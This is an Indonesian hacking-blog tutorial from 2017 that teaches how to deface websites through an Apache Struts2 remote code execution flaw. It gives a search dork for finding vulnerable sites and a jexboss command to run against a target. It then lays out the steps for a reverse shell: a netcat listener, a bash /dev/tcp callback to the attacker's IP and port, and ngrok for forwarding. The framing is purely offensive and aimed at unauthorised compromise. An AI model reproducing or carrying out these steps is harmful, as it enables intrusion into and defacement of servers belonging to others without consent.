Tutorial Remote Code Exploit (Apache Struts2)

Author : UnknownTidak ada komentar

Cara Deface Dengan Apache Sruts2 ( Remote Code Execution)

yo apa kabar gaes :''v gue admin baru nih hehehe kali ini gue bakal share tutor tentang 
Apache struts2 Remote Code Execution
sedikit info tentang Remote Code Execution ini Remote Code execution adalah sebuah vulnrability yang memungkinkan si attacker untuk memberikan code code berbahaya seperti namanya Remote Code kita bisa meremote kode kode tersebut lalu mengirimnya ke web target 
yodah gk usah banyak cocot lagi :'v 
Yup Langsung saja
Bahan : 
Dork : intitle:"Struts Problem Report" intext:"development mode is enabled."
Python <- disini gaes 
jexboss <- disini gaes 
netcat <-  disini gaes 

Langsung Ke tutor

1.Buka CMD lalu ke folder jexboss nya

2.yang ke dua ketikkan 
python jexboss.py -u http://targetklean.com 
klo vuln ada bacaan vulnerable trus ketik yes


3.sekarang kita coba reverse shell
Buka Netcat nya trus ketikkan
nc -lnvp 123















habis itu ke jexbossnya yang berhasil kita exploit
4.ketikkan /bin/bash -i > /dev/tcp/ip/port 0>&1 2>&1\n
note: klo port mu blom di forward coba pakai ngrok















Klo port blom di forward cek tutor disini gaes Tutorial back conect with Ngrok (disni)

Done udah kita berhasil reverse shell tinggal di anuin

Vidionya Gaes : disini gaes 

klo hoki sih bisa di root :''v

Artikel Terkait

Posted On : Senin, 10 Juli 2017Time : Juli 10, 2017
SHARE TO :
| | Template Created By : Binkbenks | CopyRigt By : Tutorial Hacker | |
close
Banner iklan disini
> [Tutup]